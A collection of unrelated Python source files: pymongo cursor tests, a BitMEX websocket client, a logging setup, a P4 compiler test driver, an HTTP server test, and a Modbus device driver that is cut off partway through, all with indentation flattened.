self.assertEqual(csr["ns"], "pymongo_test.test")
# The batch is a list of one raw bytes object.
self.assertEqual(len(csr["firstBatch"]), 1)
self.assertEqual(decode_all(csr["firstBatch"][0]),
[{'_id': i} for i in range(0, 4)])
listener.results.clear()
# Next raw batch of 4 documents.
next(cursor)
try:
results = listener.results
started = results['started'][0]
succeeded = results['succeeded'][0]
self.assertEqual(0, len(results['failed']))
self.assertEqual('getMore', started.command_name)
self.assertEqual('pymongo_test', started.database_name)
self.assertEqual('getMore', succeeded.command_name)
csr = succeeded.reply["cursor"]
self.assertEqual(csr["ns"], "pymongo_test.test")
self.assertEqual(len(csr["nextBatch"]), 1)
self.assertEqual(decode_all(csr["nextBatch"][0]),
[{'_id': i} for i in range(4, 8)])
finally:
# Finish the cursor.
tuple(cursor)
class TestRawBatchCommandCursor(IntegrationTest):
@classmethod
def setUpClass(cls):
super(TestRawBatchCommandCursor, cls).setUpClass()
def test_aggregate_raw(self):
c = self.db.test
c.drop()
docs = [{'_id': i, 'x': 3.0 * i} for i in range(10)]
c.insert_many(docs)
batches = list(c.aggregate_raw_batches([{'$sort': {'_id': 1}}]))
self.assertEqual(1, len(batches))
self.assertEqual(docs, decode_all(batches[0]))
def test_server_error(self):
c = self.db.test
c.drop()
docs = [{'_id': i, 'x': 3.0 * i} for i in range(10)]
c.insert_many(docs)
c.insert_one({'_id': 10, 'x': 'not a number'})
with self.assertRaises(OperationFailure) as exc:
list(self.db.test.aggregate_raw_batches([{
'$sort': {'_id': 1},
}, {
'$project': {'x': {'$multiply': [2, '$x']}}
}], batchSize=4))
# The server response was decoded, not left raw.
self.assertIsInstance(exc.exception.details, dict)
def test_get_item(self):
with self.assertRaises(InvalidOperation):
self.db.test.aggregate_raw_batches([])[0]
@client_context.require_version_min(3, 4)
def test_collation(self):
next(self.db.test.aggregate_raw_batches([], collation=Collation('en_US')))
@client_context.require_version_max(3, 2)
def test_collation_error(self):
with self.assertRaises(ConfigurationError):
next(self.db.test.aggregate_raw_batches([], collation=Collation('en_US')))
def test_monitoring(self):
listener = EventListener()
client = rs_or_single_client(event_listeners=[listener])
c = client.pymongo_test.test
c.drop()
c.insert_many([{'_id': i} for i in range(10)])
listener.results.clear()
cursor = c.aggregate_raw_batches([{'$sort': {'_id': 1}}], batchSize=4)
# Start cursor, no initial batch.
started = listener.results['started'][0]
succeeded = listener.results['succeeded'][0]
self.assertEqual(0, len(listener.results['failed']))
self.assertEqual('aggregate', started.command_name)
self.assertEqual('pymongo_test', started.database_name)
self.assertEqual('aggregate', succeeded.command_name)
csr = succeeded.reply["cursor"]
self.assertEqual(csr["ns"], "pymongo_test.test")
# First batch is empty.
self.assertEqual(len(csr["firstBatch"]), 0)
listener.results.clear()
# Batches of 4 documents.
n = 0
for batch in cursor:
results = listener.results
started = results['started'][0]
succeeded = results['succeeded'][0]
self.assertEqual(0, len(results['failed']))
self.assertEqual('getMore', started.command_name)
self.assertEqual('pymongo_test', started.database_name)
self.assertEqual('getMore', succeeded.command_name)
csr = succeeded.reply["cursor"]
self.assertEqual(csr["ns"], "pymongo_test.test")
self.assertEqual(len(csr["nextBatch"]), 1)
self.assertEqual(csr["nextBatch"][0], batch)
self.assertEqual(decode_all(batch),
[{'_id': i} for i in range(n, min(n + 4, 10))])
n += 4
listener.results.clear()
if __name__ == "__main__":
unittest.main()
|
ws_thread.py
|
import sys
import websocket
import threading
import traceback
import ssl
from time import sleep
import time
import json
import decimal
import datetime as dt
import logging
from market_maker.settings import settings
from market_maker.auth.APIKeyAuth import generate_expires, generate_signature
from market_maker.utils.log import setup_custom_logger
from market_maker.utils.math import toNearest
from future.utils import iteritems
from future.standard_library import hooks
with hooks(): # Python 2/3 compat
from urllib.parse import urlparse, urlunparse
# Connects to BitMEX websocket for streaming realtime data.
# The Marketmaker still interacts with this as if it were a REST Endpoint, but now it can get
# much more realtime data without heavily polling the API.
#
# The Websocket offers a bunch of data as raw properties right on the object.
# On connect, it synchronously asks for a push of all this data then returns.
# Right after, the MM can start using its data. It will be updated in realtime, so the MM can
# poll as often as it wants.
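# A minimal usage sketch (an illustration, not part of the original module; it assumes the
# trade-only subscription configured in connect() below):
#
#   ws = BitMEXWebsocket()
#   ws.connect("https://www.bitmex.com/api/v1", symbol="XBTUSD", shouldAuth=False)
#   while ws.ws.sock.connected:
#       print(ws.recent_trades()[-1])   # latest trade pushed over the websocket
#       sleep(1)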
class BitMEXWebsocket():
# Don't grow a table larger than this amount. Helps cap memory usage.
MAX_TABLE_LEN = 1000
def __init__(self):
self.logger = logging.getLogger('root')
self.__reset()
def __del__(self):
self.exit()
def connect(self, endpoint="", symbol="XBTUSD", shouldAuth=False):
'''Connect to the websocket and initialize data stores.'''
self.logger.debug("Connecting WebSocket.")
self.symbol = symbol
self.shouldAuth = shouldAuth
# We can subscribe right in the connection querystring, so let's build that.
# Subscribe to all pertinent endpoints
#subscriptions = [sub + ':' + symbol for sub in ["quote", "trade"]]
#subscriptions = [sub + ':' + symbol for sub in ["orderBookL2", "trade"]]
subscriptions = [sub + ':' + symbol for sub in ["trade"]]
#subscriptions += ["instrument"] # We want all of them
if self.shouldAuth:
subscriptions += [sub + ':' + symbol for sub in ["order", "execution"]]
subscriptions += ["margin", "position"]
# Get WS URL and connect.
urlParts = list(urlparse(endpoint))
urlParts[0] = urlParts[0].replace('http', 'ws')
urlParts[2] = "/realtime?subscribe=" + ",".join(subscriptions)
wsURL = urlunparse(urlParts)
self.logger.info("Connecting to %s" % wsURL)
self.__connect(wsURL)
self.logger.info('Connected to WS. Waiting for data images, this may take a moment...')
# Connected. Wait for partials
self.__wait_for_symbol(symbol)
if self.shouldAuth:
self.__wait_for_account()
self.logger.info('Got all market data. Starting.')
#
# Data methods
#
def get_instrument(self, symbol):
instruments = self.data['instrument']
matchingInstruments = [i for i in instruments if i['symbol'] == symbol]
if len(matchingInstruments) == 0:
raise Exception("Unable to find instrument or index with symbol: " + symbol)
instrument = matchingInstruments[0]
# Turn the 'tickSize' into 'tickLog' for use in rounding
# http://stackoverflow.com/a/6190291/832202
instrument['tickLog'] = decimal.Decimal(str(instrument['tickSize'])).as_tuple().exponent * -1
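# For example, a tickSize of 0.5 gives Decimal('0.5').as_tuple().exponent == -1,
# so tickLog == 1, i.e. prices for this instrument are rounded/formatted to one decimal place.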
return instrument
def get_ticker(self, symbol):
'''Return a ticker object. Generated from instrument.'''
instrument = self.get_instrument(symbol)
# If this is an index, we have to get the data from the last trade.
if instrument['symbol'][0] == '.':
ticker = {}
ticker['mid'] = ticker['buy'] = ticker['sell'] = ticker['last'] = instrument['markPrice']
# Normal instrument
else:
bid = instrument['bidPrice'] or instrument['lastPrice']
ask = instrument['askPrice'] or instrument['lastPrice']
ticker = {
"last": instrument['lastPrice'],
"buy": bid,
"sell": ask,
"mid": (bid + ask) / 2
}
# The instrument has a tickSize. Use it to round values.
return {k: toNearest(float(v or 0), instrument['tickSize']) for k, v in iteritems(ticker)}
def funds(self):
return self.data['margin'][0]
def market_depth(self, symbol):
raise NotImplementedError('orderBook is not subscribed; use askPrice and bidPrice on instrument')
# return self.data['orderBook25'][0]
def open_orders(self, clOrdIDPrefix):
orders = self.data['order']
# Filter to only open orders (leavesQty > 0) and those that we actually placed
return [o for o in orders if str(o['clOrdID']).startswith(clOrdIDPrefix) and o['leavesQty'] > 0]
def position(self, symbol):
positions = self.data['position']
pos = [p for p in positions if p['symbol'] == symbol]
if len(pos) == 0:
# No position found; stub it
return {'avgCostPrice': 0, 'avgEntryPrice': 0, 'currentQty': 0, 'symbol': symbol}
return pos[0]
def recent_trades(self):
return self.data['trade']
#
# Lifecycle methods
#
def error(self, err):
self._error = err
self.logger.error(err)
self.exit()
def exit(self):
self.exited = True
self.ws.close()
#
# Private methods
#
def __connect(self, wsURL):
'''Connect to the websocket in a thread.'''
self.logger.debug("Starting thread")
ssl_defaults = ssl.get_default_verify_paths()
sslopt_ca_certs = {'ca_certs': ssl_defaults.cafile}
self.ws = websocket.WebSocketApp(wsURL,
on_message=self.__on_message,
on_close=self.__on_close,
on_open=self.__on_open,
on_error=self.__on_error,
header=self.__get_auth()
)
setup_custom_logger('websocket', log_level=settings.LOG_LEVEL)
self.wst = threading.Thread(target=lambda: self.ws.run_forever(sslopt=sslopt_ca_certs))
self.wst.daemon = True
self.wst.start()
self.logger.info("Started thread")
# Wait for connect before continuing
conn_timeout = 5
while (not self.ws.sock or not self.ws.sock.connected) and conn_timeout and not self._error:
sleep(1)
conn_timeout -= 1
if not conn_timeout or self._error:
self.logger.error("Couldn't connect to WS! Exiting.")
self.exit()
sys.exit(1)
def __get_auth(self):
'''Return auth headers. Will use API Keys if present in settings.'''
if self.shouldAuth is False:
return []
self.logger.info("Authenticating with API Key.")
# To auth to the WS using an API key, we generate a signature of a nonce and
# the WS API endpoint.
nonce = generate_expires()
return [
"api-expires: " + str(nonce),
"api-signature: " + generate_signature(settings.API_SECRET, 'GET', '/realtime', nonce, ''),
"api-key:" + settings.API_KEY
]
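# For reference, the signature above follows BitMEX's documented scheme: roughly an
# HMAC-SHA256 over the verb, path and expiry (a sketch of what generate_signature is
# expected to compute, not a replacement for it):
#   hmac.new(api_secret.encode(), ('GET' + '/realtime' + str(nonce)).encode(),
#            hashlib.sha256).hexdigest()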
def __wait_for_account(self):
'''On subscribe, this data will come down. Wait for it.'''
# Wait for the keys to show up from the ws
while not {'margin', 'position', 'order'} <= set(self.data):
sleep(0.1)
def __wait_for_symbol(self, symbol):
'''On subscribe, this data will come down. Wait for it.'''
# Only the 'trade' table is subscribed above, so only wait for it; waiting for
# 'instrument' or 'quote' here would block forever with the current subscriptions.
while 'trade' not in self.data:
sleep(0.1)
def __send_command(self, command, args):
'''Send a raw command.'''
self.ws.send(json.dumps({"op": command, "args": args or []}))
def __on_message(self, message):
'''Handler for parsing WS messages.'''
receive_time = dt.datetime.fromtimestamp(time.time())
receive_time = dt.datetime.strftime(receive_time, "%H:%M:%S.%f")
# not sure why this LoggerAdapter approach isn't working
#self.logger = logging.LoggerAdapter(self.logger, extra={'receive_time': receive_time})
print(receive_time)
message = json.loads(message)
self.logger.debug(json.dumps(message))
table = message['table'] if 'table' in message else None
action = message['action'] if 'action' in message else None
try:
if 'subscribe' in message:
if message['success']:
self.logger.debug("Subscribed to %s." % message['subscribe'])
else:
self.error("Unable to subscribe to %s. Error: \"%s\" Please check and restart." %
(message['request']['args'][0], message['error']))
elif 'status' in message:
if message['status'] == 400:
self.error(message['error'])
if message['status'] == 401:
self.error("API Key incorrect, please check and restart.")
elif action:
if table not in self.data:
self.data[table] = []
if table not in self.keys:
self.keys[table] = []
# There are four possible actions from the WS:
# 'partial' - full table image
# 'insert' - new row
# 'update' - update row
# 'delete' - delete row
if action == 'partial':
self.logger.debug("%s: partial" % table)
self.data[table] += message['data']
# Keys are communicated on partials to let you know how to uniquely identify
# an item. We use it for updates.
self.keys[table] = message['keys']
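# (For example, a 'partial' on the 'order' table typically reports keys == ['orderID'],
# so later 'update'/'delete' messages are matched on that field.)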
elif action == 'insert':
self.logger.debug('%s: inserting %s' % (table, message['data']))
self.data[table] += message['data']
# Limit the max length of the table to avoid excessive memory usage.
# Don't trim orders because we'll lose valuable state if we do.
if table not in ['order', 'orderBookL2'] and len(self.data[table]) > BitMEXWebsocket.MAX_TABLE_LEN:
self.data[table] = self.data[table][(BitMEXWebsocket.MAX_TABLE_LEN // 2):]
elif action == 'update':
self.logger.debug('%s: updating %s' % (table, message['data']))
# Locate the item in the collection and update it.
for updateData in message['data']:
item = findItemByKeys(self.keys[table], self.data[table], updateData)
if not item:
continue # No item found to update. Could happen before push
# Log executions
if table == 'order':
is_canceled = 'ordStatus' in updateData and updateData['ordStatus'] == 'Canceled'
if 'cumQty' in updateData and not is_canceled:
contExecuted = updateData['cumQty'] - item['cumQty']
if contExecuted > 0:
instrument = self.get_instrument(item['symbol'])
self.logger.info("Execution: %s %d Contracts of %s at %.*f" %
(item['side'], contExecuted, item['symbol'],
instrument['tickLog'], item['price']))
# Update this item.
item.update(updateData)
# Remove canceled / filled orders
if table == 'order' and item['leavesQty'] <= 0:
self.data[table].remove(item)
elif action == 'delete':
self.logger.debug('%s: deleting %s' % (table, message['data']))
# Locate the item in the collection and remove it.
for deleteData in message['data']:
item = findItemByKeys(self.keys[table], self.data[table], deleteData)
self.data[table].remove(item)
else:
raise Exception("Unknown action: %s" % action)
except:
self.logger.error(traceback.format_exc())
def __on_open(self):
self.logger.debug("Websocket Opened.")
def __on_close(self):
self.logger.info('Websocket Closed')
self.exit()
def __on_error(self, ws, error):
if not self.exited:
self.error(error)
def __reset(self):
self.data = {}
self.keys = {}
self.exited = False
self._error = None
def findItemByKeys(keys, table, matchData):
for item in table:
matched = True
for key in keys:
if item[key] != matchData[key]:
matched = False
if matched:
return item
if __name__ == "__main__":
# create console handler and set level to debug
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
#fh = logging.FileHandler('/home/hh2010/2019-12-09-pm-trd.log')
#fh.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
# create formatter
formatter = logging.Formatter("%(asctime)s - %(name)s - %(levelname)s - %(message)s")
# add formatter to ch
ch.setFormatter(formatter)
logger.addHandler(ch)
#logger.addHandler(fh)
ws = BitMEXWebsocket()
ws.logger = logger
ws.connect("https://www.bitmex.com/api/v1")
while ws.ws.sock.connected:
sleep(1)
|
logging_handler.py
|
import logging
import logging.config
import logging.handlers
import threading
from multiprocessing import Queue
_console_log = 15
class LogLevelFilter(logging.Filter):
def __init__(self, param=None):
self._level = param
def filter(self, record):
return record.levelno in self._level and record.levelno >= _console_log
class LogInfoLevelFilter(logging.Filter):
def __init__(self, param=None):
self._level = param
def filter(self, record):
if self._level == 25 and record.levelno == 25:
return True
if self._level == 25 and record.levelno == 10:
return True
if self._level == 10 and record.levelno ==10 :
return True
return False
def logger_thread(q):
while True:
record = q.get()
if record is None:
break
logger = logging.getLogger(record.name)
logger.handle(record)
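# A worker process would typically forward its records into this queue with a
# QueueHandler (a sketch; `log_queue` stands for the Queue created in KerviLogHandler
# as self._log_queue):
#   qh = logging.handlers.QueueHandler(log_queue)
#   logging.getLogger().addHandler(qh)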
class KerviLogHandler:
def __init__(self, config):
import platform
log_level = config.log.level
if log_level == "debug":
log_level = logging.DEBUG
if log_level == "verbose":
log_level = 15
if log_level == "info":
log_level = logging.INFO
if log_level == "warning":
log_level = logging.WARNING
if log_level == "error":
log_level = logging.ERROR
# The console threshold is shared with the filters via the module-level
# _console_log, so declare it global here; also compare against console_level
# (not log_level) for the warning/error cases.
global _console_log
console_level = config.log.console_level
if console_level == "debug":
_console_log = logging.DEBUG
if console_level == "verbose":
_console_log = 15
if console_level == "info":
_console_log = logging.INFO
if console_level == "warning":
_console_log = logging.WARNING
if console_level == "error":
_console_log = logging.ERROR
log_config = {
'version': 1,
'filters':{
'info':{
'()': LogLevelFilter,
'param': [logging.INFO]
},
'verbose':{
'()': LogLevelFilter,
'param': [15]
},
'warning':{
'()': LogLevelFilter,
'param': [logging.WARNING]
},
'error':{
'()': LogLevelFilter,
'param': [logging.ERROR]
}
},
'formatters': {
'detailed': {
'class': 'logging.Formatter',
'format': '%(asctime)s %(name)-15s %(levelname)-8s %(processName)-10s %(message)s'
},
'console': {
'class': 'logging.Formatter',
'format': '\033[92m%(message)s \033[0m',
},
'console-verbose': {
'class': 'logging.Formatter',
'format': '\33[90m %(message)s \33[0m',
},
'console-warning': {
'class': 'logging.Formatter',
'format': '\33[93m%(message)s \33[0m',
},
'console-error': {
'class': 'logging.Formatter',
'format': '\033[91m%(levelname)-8s %(processName)-10s %(message)s \033[0m',
},
},
'handlers': {
'console': {
'class': 'logging.StreamHandler',
'level': 'INFO',
'formatter': 'console',
'filters': ['info']
},
'console-verbose': {
'class': 'logging.StreamHandler',
'level': 15,
'formatter': 'console-verbose',
'filters': ['verbose']
},
'console-warning': {
'class': 'logging.StreamHandler',
'level': 'WARNING',
'formatter': 'console-warning',
'filters': ['warning']
},
'console-error': {
'class': 'logging.StreamHandler',
'level': 'ERROR',
'formatter': 'console-error',
'filters': ['error']
},
'file': {
'class': 'logging.handlers.RotatingFileHandler',
'filename': config.log.file,
'mode': 'w',
'backupCount': 3,
'maxBytes': config.log.max_file_size,
'formatter': 'detailed',
},
},
'loggers':{
'kervi':{
'handlers': ['console', 'file']
}
},
'root': {
'level': log_level,
'handlers': ['console', 'console-verbose', 'console-warning', 'console-error', 'file']
},
}
logging.config.dictConfig(log_config)
self._log_queue = Queue()
self._logging_thread = threading.Thread(target=logger_thread, args=(self._log_queue,))
self._logging_thread.daemon = True
if platform.system() == "Windows":
self._logging_thread.start()
#return KerviLog("application")
def stop(self):
self._log_queue.put_nowait(None)
|
run-p4-sample.py
|
#!/usr/bin/env python2
# Copyright 2013-present Barefoot Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Runs the compiler on a sample P4 V1.2 program
from __future__ import print_function
from subprocess import Popen,PIPE
from threading import Thread
import errno
import sys
import re
import os
import stat
import tempfile
import shutil
import difflib
import subprocess
import glob
SUCCESS = 0
FAILURE = 1
class Options(object):
def __init__(self):
self.binary = "" # this program's name
self.cleanupTmp = True # if false do not remove the tmp folder created
self.p4filename = "" # file that is being compiled
self.compilerSrcDir = "" # path to compiler source tree
self.verbose = False
self.replace = False # replace previous outputs
self.dumpToJson = False
self.compilerOptions = []
self.runDebugger = False
self.generateP4Runtime = False
def usage(options):
name = options.binary
print(name, "usage:")
print(name, "rootdir [options] file.p4")
print("Invokes compiler on the supplied file, possibly adding extra arguments")
print("`rootdir` is the root directory of the compiler source tree")
print("options:")
print(" -b: do not remove temporary results for failing tests")
print(" -v: verbose operation")
print(" -f: replace reference outputs with newly generated ones")
print(" -a \"args\": pass args to the compiler")
print(" --p4runtime: generate P4Info message in text format")
def isError(p4filename):
# True if the filename represents a p4 program that should fail
return "_errors" in p4filename
def ignoreStderr(options):
for line in open(options.p4filename):
if "P4TEST_IGNORE_STDERR" in line:
return True
return False
class Local(object):
# object to hold local vars accessible to nested functions
pass
def run_timeout(options, args, timeout, stderr):
if options.verbose:
print(args[0], args[len(args) - 1]) # handy for manual cut-and-paste
print(" ".join(args))
local = Local()
local.process = None
local.filter = None
def target():
procstderr = None
if stderr is not None:
# copy stderr to the specified file, stripping file path prefixes
# from the start of lines
outfile = open(stderr, "w")
# This regex is ridiculously verbose; it's written this way to avoid
# features that are not supported on both GNU and BSD (i.e., macOS)
# sed. BSD sed's character class support is not great; for some
# reason, even some character classes that the man page claims are
# available don't seem to actually work.
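# For example, a diagnostic such as "/abs/path/to/sample.p4(42): error ..." is rewritten
# to "sample.p4(42): error ..." so reference outputs stay path-independent.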
local.filter = Popen(['sed', '-E',
r's|^[-[:alnum:][:punct:][:space:]_/]*/([-[:alnum:][:punct:][:space:]_]+\.[ph]4?[:(][[:digit:]]+)|\1|'],
stdin=PIPE, stdout=outfile)
procstderr = local.filter.stdin
local.process = Popen(args, stderr=procstderr)
local.process.wait()
if local.filter is not None:
local.filter.stdin.close()
local.filter.wait()
thread = Thread(target=target)
thread.start()
thread.join(timeout)
if thread.is_alive():
print("Timeout ", " ".join(args), file=sys.stderr)
local.process.terminate()
thread.join()
if local.process is None:
# never even started
if options.verbose:
print("Process failed to start")
return -1
if options.verbose:
print("Exit code ", local.process.returncode)
return local.process.returncode
timeout = 10 * 60
def compare_files(options, produced, expected):
if options.replace:
if options.verbose:
print("Saving new version of ", expected)
shutil.copy2(produced, expected)
return SUCCESS
if options.verbose:
print("Comparing", expected, "and", produced)
cmd = ("diff -B -u -w " + expected + " " + produced + " >&2")
if options.verbose:
print(cmd)
exitcode = subprocess.call(cmd, shell=True)
if exitcode == 0:
return SUCCESS
else:
return FAILURE
def recompile_file(options, produced, mustBeIdentical):
# Compile the generated file a second time
secondFile = produced + "-x"
args = ["./p4test", "-I.", "--pp", secondFile, "--std", "p4-16", produced] + \
options.compilerOptions
result = run_timeout(options, args, timeout, None)
if result != SUCCESS:
return result
if mustBeIdentical:
result = compare_files(options, produced, secondFile)
return result
def check_generated_files(options, tmpdir, expecteddir):
files = os.listdir(tmpdir)
for file in files:
if options.verbose:
print("Checking", file)
produced = tmpdir + "/" + file
expected = expecteddir + "/" + file
if not os.path.isfile(expected):
if options.verbose:
print("Expected file does not exist; creating", expected)
shutil.copy2(produced, expected)
else:
result = compare_files(options, produced, expected)
if result != SUCCESS and (file[-7:] != "-stderr" or not ignoreStderr(options)):
return result
return SUCCESS
def file_name(tmpfolder, base, suffix, ext):
return tmpfolder + "/" + base + "-" + suffix + ext
def process_file(options, argv):
assert isinstance(options, Options)
tmpdir = tempfile.mkdtemp(dir=".")
basename = os.path.basename(options.p4filename)
base, ext = os.path.splitext(basename)
dirname = os.path.dirname(options.p4filename)
if "_samples/" in dirname:
expected_dirname = dirname.replace("_samples/", "_samples_outputs/", 1)
elif "_errors/" in dirname:
expected_dirname = dirname.replace("_errors/", "_errors_outputs/", 1)
elif "p4_14/" in dirname:
expected_dirname = dirname.replace("p4_14/", "p4_14_outputs/", 1)
elif "p4_16/" in dirname:
expected_dirname = dirname.replace("p4_16/", "p4_16_outputs/", 1)
else:
expected_dirname = dirname + "_outputs" # expected outputs are here
if not os.path.exists(expected_dirname):
os.makedirs(expected_dirname)
# We rely on the fact that these keys are in alphabetical order.
rename = { "FrontEndDump": "first",
"FrontEndLast": "frontend",
"MidEndLast": "midend" }
if options.verbose:
print("Writing temporary files into ", tmpdir)
ppfile = tmpdir + "/" + basename # after parsing
referenceOutputs = ",".join(rename.keys())
stderr = tmpdir + "/" + basename + "-stderr"
p4runtimefile = tmpdir + "/" + basename + ".p4info.txt"
# Create the `json_outputs` directory if it doesn't already exist. There's a
# race here since multiple tests may run this code in parallel, so we can't
# check if it exists beforehand.
try:
os.mkdir("./json_outputs")
except OSError as exc:
if exc.errno == errno.EEXIST:
pass
else:
raise
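# Note (illustrative, not from the original script): on Python 3.2+ the same
# race-free directory creation can be written as
#   os.makedirs("./json_outputs", exist_ok=True)
# The explicit EEXIST check above achieves the same effect and also works on
# Python 2.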
jsonfile = "./json_outputs" + "/" + basename + ".json"
# P4Info generation requires knowledge of the architecture, so we must
# invoke the compiler with a valid --arch.
def getArch(path):
v1Pattern = re.compile('include.*v1model\.p4')
psaPattern = re.compile('include.*psa\.p4')
with open(path, 'r') as f:
for line in f:
if v1Pattern.search(line):
return "v1model"
elif psaPattern.search(line):
return "psa"
return None
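# For example (illustrative): a test whose source contains the line
#   #include <v1model.p4>
# makes getArch() return "v1model", and the driver then adds "--arch v1model"
# to the p4test invocation below; files matching neither pattern return None
# and are compiled without an explicit --arch.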
if not os.path.isfile(options.p4filename):
raise Exception("No such file " + options.p4filename)
args = ["./p4test", "--pp", ppfile, "--dump", tmpdir, "--top4", referenceOutputs,
"--testJson"] + options.compilerOptions
arch = getArch(options.p4filename)
if arch is not None:
args.extend(["--arch", arch])
if options.generateP4Runtime:
args.extend(["--p4runtime-files", p4runtimefile])
if "p4_14" in options.p4filename or "v1_samples" in options.p4filename:
args.extend(["--std", "p4-14"]);
args.extend(argv)
if options.runDebugger:
args[0:0] = options.runDebugger.split()
os.execvp(args[0], args)
result = run_timeout(options, args, timeout, stderr)
if result != SUCCESS:
print("Error compiling")
print("".join(open(stderr).readlines()))
# If the compiler crashed fail the test
if 'Compiler Bug' in open(stderr).read():
return FAILURE
expected_error = isError(options.p4filename)
if expected_error:
# invert result
if result == SUCCESS:
result = FAILURE
else:
result = SUCCESS
# Canonicalize the generated file names
lastFile = None
for k in sorted(rename.keys()):
files = glob.glob(tmpdir + "/" + base + "*" + k + "*.p4");
if len(files) > 1:
print("Multiple files matching", k);
elif len(files) == 1:
file = files[0]
if os.path.isfile(file):
newName = file_name(tmpdir, base, rename[k], ext)
os.rename(file, newName)
lastFile = newName
if (result == SUCCESS):
result = check_generated_files(options, tmpdir, expected_dirname);
if (result == SUCCESS) and (not expected_error):
result = recompile_file(options, ppfile, False)
if (result == SUCCESS) and (not expected_error) and (lastFile is not None):
# Unfortunately compilation and pretty-printing of lastFile is
# not idempotent: For example a constant such as 8s128 is
# converted by the compiler to -8s128.
result = recompile_file(options, lastFile, False)
if options.cleanupTmp:
if options.verbose:
print("Removing", tmpdir)
shutil.rmtree(tmpdir)
return result
def isdir(path):
try:
return stat.S_ISDIR(os.stat(path).st_mode)
except OSError:
return False;
######################### main
def main(argv):
options = Options()
options.binary = argv[0]
if len(argv) <= 2:
usage(options)
sys.exit(FAILURE)
options.compilerSrcdir = argv[1]
argv = argv[2:]
if not os.path.isdir(options.compilerSrcdir):
print(options.compilerSrcdir + " is not a folder", file=sys.stderr)
usage(options)
sys.exit(FAILURE)
while argv[0][0] == '-':
if argv[0] == "-b":
options.cleanupTmp = False
elif argv[0] == "-v":
options.verbose = True
elif argv[0] == "-f":
options.replace = True
elif argv[0] == "-j":
options.dumpToJson = True
elif argv[0] == "-a":
if len(argv) < 2:
print("Missing argument for -a option")
usage(options)
sys.exit(FAILURE)
else:
options.compilerOptions += argv[1].split();
argv = argv[1:]
elif argv[0][1] == 'D' or argv[0][1] == 'I' or argv[0][1] == 'T':
options.compilerOptions.append(argv[0])
elif argv[0] == "-gdb":
options.runDebugger = "gdb --args"
elif argv[0] == "--p4runtime":
options.generateP4Runtime = True
else:
print("Uknown option ", argv[0], file=sys.stderr)
usage(options)
sys.exit(FAILURE)
argv = argv[1:]
if 'P4TEST_REPLACE' in os.environ:
options.replace = True
options.p4filename=argv[-1]
options.testName = None
if options.p4filename.startswith(options.compilerSrcdir):
options.testName = options.p4filename[len(options.compilerSrcdir):];
if options.testName.startswith('/'):
options.testName = options.testName[1:]
if options.testName.endswith('.p4'):
options.testName = options.testName[:-3]
result = process_file(options, argv)
if isError(options.p4filename) and result == FAILURE:
print("Program was expected to fail")
sys.exit(result)
if __name__ == "__main__":
main(sys.argv)
|
test_httpservice.py
|
import threading
import unittest
import urllib.request
from httpservice.app import Server, parsePort
from http.server import HTTPServer
import time
# Subclass that silences the request log output to stdout during tests
class QuietServer(Server):
def log_message(self, *args):
pass
class TestRequests(unittest.TestCase):
def test_shortArgParse(self):
parser = parsePort(['-p', '9092'])
self.assertEqual(parser, 9092)
def setUp(self):
self.server = HTTPServer(("localhost", 9092), QuietServer)
self.server_thread = threading.Thread(target=self.server.serve_forever)
self.server_thread.daemon = True
self.server_thread.start()
def test_route_helloworld(self):
res = urllib.request.urlopen('http://localhost:9092/helloworld')
self.assertEqual(res.code, 200)
self.assertEqual(res.read(), bytes('Hello Stranger', 'UTF-8'))
def test_route_versionz(self):
route = urllib.request.urlopen('http://localhost:9092/versionz')
self.assertEqual(route.code, 200)
def tearDown(self):
self.server.shutdown()
self.server.server_close()
if __name__ == '__main__':
unittest.main()
|
mate_ksx3267v2.py
|
#!/usr/bin/env python
#
# -*- coding: utf-8 -*-
#
# Copyright (c) 2018 JiNong, Inc.
# All right reserved.
#
import struct
import time
import socket
import select
import traceback
import hashlib
import json
from enum import IntEnum
from threading import Thread, Lock
from mate import Mate, ThreadMate, DevType
from mblock import MBlock, BlkType, StatCode, ResCode, CmdCode, Observation, Request, Response, NotiCode, Notice
from pymodbus.client.sync import ModbusSerialClient
from pymodbus.client.sync import ModbusTcpClient
class NodeType(IntEnum):
SENNODE = 1
ACTNODE = 2
INTNODE = 3
NUTNODE = 4
class ProtoVer(IntEnum):
KS_X_3267_2018 = 101
TTA_1 = 201
class KSX3267MateV2(ThreadMate):
_SLEEP = 0.5
_VERSION = "KSX3267_0.1"
_KEYWORDS = {"value" : (2, "float"), "status" : (1, "status"),
"opid" : (1, "short"), "state-hold-time" : (2, "int"), "ratio": (1, "short"),
"position" : (1, "short"), "remain-time" : (2, "int"),
"control": (1, "control"), "area" : (1, "short"), "alert" : (1, "alert"),
"hold-time" : (2, "int"), "operation" : (1, "operation"),
"time" : (2, "int"), "opentime" : (1, "short"), "closetime" : (1, "short"),
"EC": (2, "float"), "pH": (2, "float"), "on-sec" : (1, "short"),
"start-area" : (1, "short"), "stop-area": (1, "short"),
"epoch" : (2, "int"), "vfloat": (2, "float"), "vint" : (2, "int")}
_DEVINFOREG = 2
_DEVCODEREG = 101
def __init__(self, option, devinfo, coupleid, logger):
super(KSX3267MateV2, self).__init__(option, devinfo, coupleid, logger)
self._timeout = 3 if "timeout" not in option else option["timeout"]
self._conn = {}
self._tempthd = []
self._isdetecting = False
self._detection = {"port": [], "saddr":0, "eaddr":0, "opid":0}
#self._nodes = self._devinfo.getgw()["children"]
self._lock = Lock()
self._logger.info("KSX3267MateV2 Started.")
def detect_node(self, conn, unit, registers):
print "detect_node", unit, registers
compcode = registers[0]
nodecode = registers[2]
size = registers[4]
while True:
res = self.readregister(conn, KSX3267MateV2._DEVCODEREG, size, unit)
if res is None or res.isError():
self._logger.warn("Fail to get devices from " + str(unit) + " " + str(res))
return None
if len(res.registers) != size:
self._logger.info("retry to get data since size of data is not matched. " + str(size) + " " + str(len(res.registers)))
continue
return {"compcode" : compcode, "nodecode" : nodecode, "devcodes": res.registers}
def getdk(self, dev, idx):
dk = json.loads(dev["dk"])
return dk[idx]
def setdetection(self, flag, opid=0):
self._isdetecting = flag
self._detection["opid"] = opid
def startdetection(self, params, opid):
if self._detection["opid"] != 0:
self._logger.info("detection is processing.... so this command would be ignored.")
return ResCode.FAIL
self.setdetection(True, opid)
if params:
